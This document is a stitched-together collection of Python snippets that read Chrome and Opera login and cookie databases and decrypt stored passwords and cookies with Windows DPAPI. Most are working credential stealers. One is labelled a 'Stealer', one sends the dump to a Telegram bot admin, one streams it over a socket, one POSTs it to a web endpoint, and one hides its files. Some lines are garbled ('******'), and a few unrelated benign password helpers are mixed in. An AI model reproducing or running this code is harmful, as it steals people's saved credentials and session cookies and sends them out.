def pluck_passwords(self):
PATH = 'C:/Users/{}/AppData/Local/Google/Chrome/User Data/Default/Login Data'.format(
os.getlogin())
# Copies the chrome database over to the temporary directory.
copy(PATH, gettempdir())
# SQLite Connection
conn = sqlite3.connect(gettempdir() + '//Login Data')
cur = conn.cursor()
user_data = None
try:
cur.execute(
'SELECT action_url, username_value, password_value FROM logins'
)
user_data = cur.fetchall()
except Exception:
print('\nError fetching passwords.')
for r in user_data:
password = win32crypt.CryptUnprotectData(r[2], None, None, None,
0)[1]
password = password.decode("utf-8")
username = r[1]
host = r[0]
# Creates a string for each website / username / password combination
result = '{0}\n\t{1}\n\t{2}\n\n'.format(host, username, password)
# Adds each result to the payload, ready to be uploaded.
self.payload += result
def get_cookies(cookies_db_path, host_key, aes_gcm_key):
"""Get the cookies for the specified host_key from Chrome Cookies sqlite database."""
cookies = []
with tempfile.TemporaryDirectory(prefix="twitchget_") as temp_dir:
# Copy the cookies database to avoid hitting a lock and open
cookies_db_copy_path = shutil.copy(cookies_db_path, temp_dir)
db = sqlite3.connect(cookies_db_copy_path)
query = "SELECT name, path, expires_utc, is_secure, encrypted_value "\
"FROM cookies WHERE host_key=?"
cursor = db.cursor()
cursor.execute(query, (host_key, ))
for result in cursor.fetchall():
name, path, expiry, secure, ev = result
# Skip cookies that are blacklisted by name or session-only
if name in COOKIES_BLACKLIST or expiry == 0:
continue
# Decrypt the cookie value
if ev.startswith(b"v10"):
nonce, cipertext = ev[3:15], ev[15:]
aes_gcm = AESGCM(aes_gcm_key)
dv = aes_gcm.decrypt(nonce, cipertext, None).decode("utf-8")
else:
dv = win32crypt.CryptUnprotectData(ev, None, None, None,
0)[1].decode("utf-8")
cookies.append((name, path, expiry, secure, dv))
# Close the database cleanly
db.close()
return cookies
def decrypt_password(password, key):
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
def _decrypt(self, value, encrypted_value, key):
"""Decrypt encoded cookies
"""
if (sys.platform == 'darwin') or sys.platform.startswith('linux'):
if value or (encrypted_value[:3] != b'v10'):
return value
# Encrypted cookies should be prefixed with 'v10' according to the
# Chromium code. Strip it off.
encrypted_value = encrypted_value[3:]
# Strip padding by taking off number indicated by padding
# eg if last is '\x0e' then ord('\x0e') == 14, so take off 14.
def clean(x):
last = x[-1]
if isinstance(last, int):
return x[:-last].decode('utf8')
else:
return x[:-ord(last)].decode('utf8')
iv = b' ' * 16
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
decrypted = cipher.decrypt(encrypted_value)
return clean(decrypted)
else:
# Must be win32 (on win32, all chrome cookies are encrypted)
try:
import win32crypt
except ImportError:
raise BrowserCookieError(
'win32crypt must be available to decrypt Chrome cookie on Windows'
)
return win32crypt.CryptUnprotectData(encrypted_value, None, None,
None, 0)[1].decode("utf-8")
def get_chrome():
#close the chrome browser
os.system("taskkill /im chrome.exe /f")
#Locate "Login Data" file where all passwords are saved
data_path = os.path.expanduser(
'~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
c = sqlite3.connect(data_path)
cursor = c.cursor()
#Select URL, UserName, Pwds from logins table
select_stmt = "SELECT origin_url,username_value,password_value FROM logins"
cursor.execute(select_stmt)
login_data = cursor.fetchall()
cursor.close()
cred = {}
pwds = {}
#Decode saved passwords
for url, user_name, pwd in login_data:
pwd = win32crypt.CryptUnprotectData(pwd)
cred[url] = (user_name, pwd[1].decode('utf8'))
#Save it to text file "pwds.txt"
with open('passwords.txt', 'a') as f:
for i, j in cred.items():
if j[1] != '' and j[0] != '':
i1 = i.split('/')
pwds[i1[2]] = (j[0], j[1])
#sort according to URL in assending
for j in sorted(pwds):
f.write("{0:<35}{1:<35}{2:<15}\n".format(j, pwds[j][0],
pwds[j][1]))
def get_chrome():
data_path = os.path.expanduser(
'~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
x = open(data_path, 'rb')
z = x.read()
x.close()
f = open('logininfo', 'wb')
f.write(z)
f.close()
c = sqlite3.connect('logininfo')
cursor = c.cursor()
select_statement = 'SELECT origin_url, username_value, password_value FROM logins'
cursor.execute(select_statement)
login_data = cursor.fetchall()
cred = {}
string = ''
for url, user_name, pwd in login_data:
pwd = win32crypt.CryptUnprotectData(pwd)
cred[url] = user_name, pwd[1].decode('utf8')
string += '\n[+] URL: %s \n USERNAME:%s \n PASSWORD:%s\n' % (
url, user_name, pwd[1].decode('utf8'))
print(string)
a = open('loginids.txt', 'a')
a.write(string)
a.close()
def getChromePasswords():
info_list = []
path = getPath()
try:
connection = sqlite3.connect(path + 'Login Data')
with connection:
cursor = connection.cursor()
v = cursor.execute(
'SELECT action_url, username_value, password_value FROM logins'
)
value = v.fetchall()
for website_url, username, password in value:
if os.name == 'nt':
password = win32crypt.CryptUnprotectData(
password, None, None, None, 0)[1]
if password:
info_list.append({
'website_url': website_url,
'username': username,
'password': str(password)
})
return info_list
except Exception as e:
return [{
"error": str(e)
}, {
"Problem":
"User doesn't use Google Chrome or isn't using Windows"
}]
def getCookieTotxt(host, filename):
#1.第一步从本地浏览器COOKIES数据库读取数据
cookiepath = os.environ[
'LOCALAPPDATA'] + r"\Google\Chrome\User Data\Default\Cookies"
sql = "select name,encrypted_value from cookies where host_key like '%s'" % host
cookie_list = []
split_str = "; "
with sqlite3.connect(cookiepath) as conn:
cu = conn.cursor()
for name, encrypted_value in cu.execute(sql).fetchall():
cookie_list.append(
name + "=" +
win32crypt.CryptUnprotectData(encrypted_value)[1].decode())
str_cookies = split_str.join(cookie_list)
print(str_cookies)
with open(filename, 'w') as f:
print(str_cookies, file=f)
#运行环境windows 2012 server python3.4 x64 chrome 50
#以下是测试代码
#Getcookies.getcookiefromchrome('www.fjetc.com','etc_cookie.txt')
#Getcookies.saveCookieTotxt('%pss.txffp.com','cookies.txt')
#Getcookies.getCookieTotxt('%pss.txffp.com','cookies.txt')
#设置allow_redirects为真
#r=requests.get(url,headers=httphead,cookies=getcookiefromchrome('pss.txffp.com'),allow_redirects=1)
#print(r.text)
def decrypt(path, save_path):
if not os.path.isfile(path):
print 'The file doesn\'t exist!'
return
connChrome = sqlite3.connect(path)
cursor = connChrome.cursor()
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except:
print 'Impossible to read ' + path
return
print '\t\t\t*** Passwords ***'
for query in cursor.fetchall():
passwd = win32crypt.CryptUnprotectData(query[2], None, None, None, 0)[1]
if passwd:
print 'URL: ' + query[0]
print 'User: '******'Password: '******'--------------------'
if save_path != '':
passwordsFile = open(save_path, 'a')
passwordsFile.writelines('URL: ' + query[0] + '\nUser: '******'\nPassword: '******'\n--------------------\n')
passwordsFile.close()
def dumpPass():
# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local
path = getenv(
"LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login Data"
path2 = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login2"
copyfile(path, path2)
conn = sqlite3.connect(path2) # Connect to the copied Database
cursor = conn.cursor(
) # Create a Cursor object and call its execute() method to perform SQL commands like SELECT
# SELECT column_name,column_name FROM table_name
# SELECT action_url and username_value and password_value FROM table logins
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
User_Pass = list()
# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.
for raw in cursor.fetchall():
# print raw[0] + '\n' + raw[1] # print the action_url (raw[0]) and print the username_value (raw[1])
password = win32crypt.CryptUnprotectData(
raw[2]
)[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it
# print password # print the password in clear text
User_Pass.append(raw[0] + ' ' + raw[1] + ' ' + password)
conn.close()
return User_Pass
def getSaveChromePW():
#path to user's login data
data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default"
login_db = os.path.join(data_path, 'Login Data')
#db connect and query
c = sqlite3.connect(login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)
login_data = cursor.fetchall()
#URL: credentials dictionary
credential = {}
#decrytping the password
for url, user_name, pwd, in login_data:
pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password
credential[url] = (user_name, pwd[1])
#writing to a text file (CAUTION: Don't leave this text file around!)
prompt = 'y'
if prompt == 'y':
with open('pwd.txt', 'w') as f:
for url, credentials in credential.iteritems():
if credentials[1]:
f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n")
else:
f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n")
print "[.] Successfully written to pwd.txt!"
else:
quit()
def start(self):
#Retriving Password Hash From Database File
c = sqlite3.connect(self.login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)
login_data = cursor.fetchall()
credentials_dict = {}
#Decrypting password
for url, user_name, pwd, in login_data:
pwd = win32crypt.CryptUnprotectData(pwd, None, None, None,
0) #Tuple
credentials_dict[url] = (user_name, pwd[1])
#Iterating Each Creds and Storing it in "self.result"
for url, credentials in six.iteritems(credentials_dict):
if credentials[1]:
self.result += "\n\nURL : " + url
self.result += "\nUsername : "******"\nPassword : "******"\n\nURL : " + url
self.result += "\nUsername : NOT FOUND"
self.result += "\nPassword : NOT FOUND"
return self.result
def chrome():
textc = "\n CHROME COOKIES "
try:
if os.path.exists(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies',
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
for result in cursor.fetchall():
cookies = win32crypt.CryptUnprotectData(result[0], None, None,
None, 0)[1]
if cookies:
textc = textc + "\n" + "url: " + result[
1] + " | name: " + result[
2] + " | data: " + cookies.decode("utf-8")
except:
return "no chrome"
#print(textc)
return (textc)
def opera():
texto = "\n OPERA COOKIES "
try:
if os.path.exists(
os.getenv("APPDATA") +
'\\Opera Software\\Opera Stable\\Cookies'):
shutil.copy2(
os.getenv("APPDATA") +
'\\Opera Software\\Opera Stable\\Cookies',
os.getenv("APPDATA") +
'\\Opera Software\\Opera Stable\\Cookies2')
conn = sqlite3.connect(
os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies2')
cursor = conn.cursor()
cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')
for result in cursor.fetchall():
cookies = win32crypt.CryptUnprotectData(result[0], None, None,
None, 0)[1]
if cookies:
texto = texto + "\n" + "url: " + result[
1] + " | name: " + result[
2] + " | data: " + cookies.decode("utf-8")
except:
return "no opera"
#print(texto)
return (texto)
def get(self):
if self.caller.ignore_policy != "1":
policy_value = self.get_from_policy(log=False)
if policy_value != None:
logger.debug("Reading %s from group policy settings" % self.name)
return policy_value
ini_value = self.get_from_ini(log=False)
if ini_value != None:
ini_value = re.sub(r'^"|"$', '', ini_value) # remove possible quotes
logger.debug("Reading %s from ini file" % self.name)
self.passwordtype = ini_value.split(":")[0]
value = ":".join(ini_value.split(":")[1:])
if self.passwordtype == "clear":
# Encrypt the password
self.set(value)
return value
elif self.passwordtype == "crypt":
#Remove base_64
if value[-1] == "#": # If an extra # has been added to the hash to force quoting
encrypted_password = base64.b64decode(value[:-1]) # Remove hash at end
else:
encrypted_password = base64.b64decode(value)
password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
return password
else:
raise WpkgConfigError("The password type %s is invalid, provide either 'clear:password' or 'crypt:encryptedpassword'" % self.passwordtype)
else:
return None
def LDParser(self):
conn = sqlite3.connect(
os.getenv("APPDATA") +
"\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
output_file_path = 'ChromeCode/ChromeLoginData'
with open(output_file_path, 'wb') as output_file:
csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
headers = []
csv_writer.writerow(headers)
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(
result[2], None, None, None, 0)[1]
if password:
print 'Site: ' + result[0]
print 'Username: '******'Password: '******'Site', result[0]) + ("\n"
'Username', result[1]) +
("\n"
'Password', password))
csv_writer.writerow(Final_list)
def getcachedpass():
# Close all chrome tabs
os.system("taskkill /F /IM chrome.exe")
# Connect to sqlite database
conn = sqlite3.connect(path)
cursor = conn.cursor()
# Read login data from cache
cursor.execute(
'Select action_url, username_value, password_value FROM logins')
urls = []
usrs = []
pwds = []
for result in cursor.fetchall():
password = str(
win32crypt.CryptUnprotectData(result[2], None, None, None,
0)[1])[2:-1]
if password != "" and result[1] != "":
urls.append(result[0])
usrs.append(result[1])
pwds.append(password)
return (urls, usrs, pwds)
def _getchromekey(self, browser):
# Newer versions of Chrome generate a key to encrypt the user passwords with.
# Chrome encrypts THAT password on Windows using the Windows DPAPI and then
# base64 encodes it to store in the browser state file.
chromekey = None
try:
state = browser["state"]
encrypted_key = state["os_crypt"]["encrypted_key"]
encrypted_key = base64.b64decode(encrypted_key)
if encrypted_key.startswith(ChromiumScanner.CHROME_DPAPI_PREFIX):
# Decrypt the key using Windows encryption
# This will not work if the user's password was changed by an
# administrator.
chromekey = win32crypt.CryptUnprotectData(encrypted_key[len(ChromiumScanner.CHROME_DPAPI_PREFIX):])[1]
else:
chromekey = encrypted_key
# Just in case we might want this key later.. lets save it.
# Only time wecan get it is now if it was encrypted with DPAPI
binfile = os.path.join(browser["staging_dir"], "chromekey.bin")
with open(binfile, "wb") as f:
f.write(chromekey)
except:
print(" [*] Chromium encryption key not found or not usable; maybe older version")
browser["chromekey"] = chromekey
return chromekey
def __key_extract(self) -> bytes:
"""Extracts AES key for the new crypto method introduced in Google Chrome V80."""
with open(os.path.join(self.base_dir + 'Local State'), 'rb') as key_file_raw:
key_file_json = json.loads(key_file_raw.read())
key_base64 = key_file_json["os_crypt"]["encrypted_key"]
key_protected = base64.b64decode(key_base64)[5:] # [5:] removes header
return win32crypt.CryptUnprotectData(key_protected, None, None, None, 0)[1] # Removing Windows' key protection
def main():
path = getenv(
'APPDATA'
) + '\..\Local\Google\Chrome\User Data\Default\Login Data' #change as required
if not os.path.isfile(path):
print '[!] Login Data file not found!\n'
quit()
print '[!] Connecting to %s' % path
# Connect to the database file
try:
con = sqlite3.connect(path)
print '[!] Connected. Decrypting passwords...\n'
except Exception as e:
print e
# Get the data
curs = con.cursor()
curs.execute(
'SELECT action_url, username_value, password_value FROM logins')
for result in curs.fetchall(): # Decrypt the Password
site_name = result[0]
user_id = result[1]
password = win32crypt.CryptUnprotectData(result[2], None, None, None,
0)[1]
if password:
print 'Site: ' + site_name
print 'Username: '******'Password: '******'\n'
print '[!] Done!\n'
def psw(m):
bot.send_message(admin, 'wait')
#path to user's login data
data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default"
login_db = os.path.join(data_path, 'Login Data')
#db connect and query
c = sqlite3.connect(login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)
login_data = cursor.fetchall()
#URL: credentials dictionary
credential = {}
#decrytping the password
for url, user_name, pwd, in login_data:
pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0)
credential[url] = (user_name, pwd[1])
with open('pwd.txt', 'w') as f:
for url, credentials in credential.iteritems():
if credentials[1]:
f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n")
else:
f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n")
psw = open('pwd.txt', 'rb')
bot.send_document(admin, psw)
def get_saved_password(name):
r"""Retrieve previously saved password. The password is returned
unencrypted. *name* is used to lookup a password on this machine,
which must be the same *name* used in :py:func:`.save_password`."""
try:
# Only import pywin32 dependency if user creates a project
# that requires encrypted password.
import win32crypt
except ImportError:
raise DistutilsModuleError("system missing required win32api "
"module. You can download from "
"http://sourceforge.net/projects.pywin32")
try:
# retrieve value from user's private registry
with _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER,
"SOFTWARE\\signet") as key:
enc = _winreg.QueryValue(key, name)
enc = base64.b64decode(enc)
# decrypt password using DPAPI (CRYPTPROECT_LOCAL_MACHINE)
return win32crypt.CryptUnprotectData(enc,
None, None, None, 4)[1]
except (WindowsError, IndexError):
return None
def Opera_cockie():
textoc = 'coded by romarakhlin\n\n\nCookies Opera:' + '\n'
textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies',
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textoc
file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()
def _decrypt(self, value, encrypted_value):
"""Decrypt encoded cookies
"""
# decryption different for windows. Use windows unprotect data
if sys.platform == 'win32':
try:
decrypted = win32crypt.CryptUnprotectData(
encrypted_value, None, None, None, 0)[1]
except:
decrypted = "<encrypted>"
return decrypted
else:
if value or (encrypted_value[:3] != b'v10'):
return value
# Encrypted cookies should be prefixed with 'v10' according to the
# Chromium code. Strip it off.
encrypted_value = encrypted_value[3:]
# Strip padding by taking off number indicated by padding
# eg if last is '\x0e' then ord('\x0e') == 14, so take off 14.
# You'll need to change this function to use ord() for python2.
def clean(x):
return x[:-ord(x[-1])].decode('utf8')
iv = b' ' * 16
cipher = AES.new(self.key, AES.MODE_CBC, IV=iv)
decrypted = cipher.decrypt(encrypted_value)
return clean(decrypted)
def decipher_new_version(self, path):
database_path = path + os.sep + 'Login Data'
if os.path.exists(database_path):
# Connect to the Database
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
# Get the results
try:
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins'
)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug(
'ERROR',
'Opera seems to be used, the database is locked. Kill the process and try again !'
)
return
pwdFound = []
for result in cursor.fetchall():
values = {}
# Decrypt the Password
password = win32crypt.CryptUnprotectData(
result[2], None, None, None, 0)[1]
if password:
values['URL'] = result[0]
values['Login'] = result[1]
values['Password'] = password
pwdFound.append(values)
return pwdFound
def get_passwd(path=None):
if path == None:
data_path = os.path.expanduser(
'~') + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
files = os.listdir(data_path)
passwd_path = os.path.join(data_path, 'Login Data')
else:
passwd_path = path
# fetch data
statement = 'select username_value, password_value, origin_url from logins;'
datas = get_data(passwd_path, statement)
print("Username|Password|Site")
for data in datas:
name = data[0]
site = data[2]
password_hash = data[1]
try:
password = win32crypt.CryptUnprotectData(password_hash, None, None,
None, 0)
password = password[1].decode("gbk")
except:
print('[*]One hash failed -- try next> Site: {} User: {}'.format(
site, name))
password = ""
print("{}|{}|{}".format(name, password, site))
def chrpass(): # legal purposes only!
strPath = APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"
if not os.path.isfile(APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"):
objSocket.send(str.encode("noexist"))
return
conn = sqlite3.connect(strPath) # connect to database
objCursor = conn.cursor()
try:
objCursor.execute("Select action_url, username_value, password_value FROM logins") # look for credentials
except: # if the chrome is open
objSocket.send(str.encode("error"))
strServerResponse = decode_utf8(objSocket.recv(1024))
if strServerResponse == "close": # if the user wants to close the browser
subprocess.Popen(["taskkill", "/f", "/im", "chrome.exe"], shell=True)
return
strResults = "Chrome Saved Passwords:" + "\n"
for result in objCursor.fetchall(): # get data as raw text from sql db
password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
if password:
strResults += "Site: " + result[0] + "\n" + "Username: "******"\n" + "Password: " \
+ decode_utf8(password)
strBuffer = str(len(strResults))
objSocket.send(str.encode(strBuffer)) # send buffer
time.sleep(0.2)
objSocket.send(str.encode(strResults))
def Chrome():
text = 'Stealer coded by Dark $ide\n\n\nPasswords Chrome:' + '\n'
text += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.copy2(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Login Data',
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(
os.getenv("LOCALAPPDATA") +
'\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += url + ' | ' + login + ' | ' + password + '\n'
return text
def steal_passwords():
path = get_path()
try:
connection = sqlite3.connect(path + "Login Data")
with connection:
cursor = connection.cursor()
v = cursor.execute(
'SELECT action_url, username_value, password_value FROM logins'
)
value = v.fetchall()
for information in value:
password = win32crypt.CryptUnprotectData(information[2], None,
None, None, 0)[1]
if password:
params = json.dumps({
'origin_url': information[0],
'username': information[1],
'password': str(password)
}).encode('utf8')
credentials = base64.b64encode(b'user:pass')
req = request.Request("http://www.example.com/restpoint",
data=params,
headers={
'content-type': 'application/json',
'Authorization':
'Basic %s' % credentials
})
request.urlopen(req)
except sqlite3.OperationalError as e:
sys.exit(0)
def stage_1():
#Extract the database of chrome passwords from the route
shutil.copy(
getenv("APPDATA") +
r"\..\Local\Google\Chrome\User Data\Default\Login Data",
'LoginData.db')
#Hide the copied database from user eyes
subprocess.check_call(["attrib", "+H", "LoginData.db"])
#Waits for database to be copied
time.sleep(2)
conn = sqlite3.connect("LoginData.db")
filename = "stage1.txt"
cursor = conn.cursor()
myfile = open(filename, 'w')
subprocess.check_call(["attrib", "+H", filename])
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
#Decrypts database
for result in cursor.fetchall():
try:
password = win32crypt.CryptUnprotectData(result[2], None, None,
None, 0)[1]
url = result[0]
username = result[1]
if password:
myfile.write("{: <70}".format(url) +
"{: <70}".format(username) +
"{: <70}".format(password.decode('utf-8')) + "\n")
except:
pass
myfile.close()
conn.close()
os.remove('LoginData.db') #Remove the copyed database
